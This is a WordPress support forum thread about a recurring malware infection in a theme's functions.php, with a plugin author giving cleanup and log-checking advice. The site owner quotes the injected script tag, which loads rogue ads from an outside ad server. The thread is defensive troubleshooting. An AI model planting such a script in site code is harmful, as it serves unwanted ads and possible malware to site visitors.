Malware Infection: MW:JS:GEN2?rogueads.unwanted_ads.1

That malicious script is already in my latest definition updates. Please check check that you are using the latest definition updates and run the Complete Scan, then tell me what you find.

Sending a screenshot of the scan results could be very useful too.

Hi,

A have also the problem.
Trying to get cleaned with Anti-Malware Security and Brute-Force Firewall but looks like this is still there (cleaned 2 days ago)
I have done nothing but upgrade to WP 4.9.1 (french)

Known javascript malware. Details: https://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1
<script type=”text/javascript” src=”//go.oclaserver.com/apu.php?zoneid=1476266″></script>

Looks like the theme functions.php is not clean.
I already fixed the file 48 hours ago.

Will wait for your reply before trying to fix it again as previously.

• This reply was modified 7 years, 3 months ago by tabasko.
• This reply was modified 7 years, 3 months ago by tabasko.
• This reply was modified 7 years, 3 months ago by tabasko.

My plugin will find and remove this threat as you can see. If you are getting reinfected with the same threat then you’ll need to find the vulnerability that is allowing you hacker to keep getting into your site. Check your log files and look for rogue admin users.

Can I fixe the 3 files before searching in log file ?

I don’t have any “debug.log” file in my wp-content folder. Not sure where I have to look ?

• This reply was modified 7 years, 3 months ago by tabasko.

I have very strong password, and no more user named “admin”.
I don’t know where to find the log your are speaking about ??

I would look for the access_log fire for your webserver. I don’t know where that would be on your server, you should ask your hosting provider. You can look at the activity in your access_log files at the time of the infection (the modified time on the infected timestamps of the files).

rogueads.unwanted_ads?1 is on my website, tried your plugin but nothing reported.

@vulks,
Usually people contribute to a forum with a question that needs answering or with an answer to someone else’s posted question. your post to this topic (which has already been resolved) does not help anyone here, nor does it present any information that I can respond to. Even if I were to infer that you need help with this threat I cannot guess at what advice might help you until I know more about your issue. My plugin should already be able to find this threat so I don’t know where your problem is. Can you please send me a screenshot of the scan results or a sample of the malware on your site so that I can see what you are dealing with and provide a helpful answer?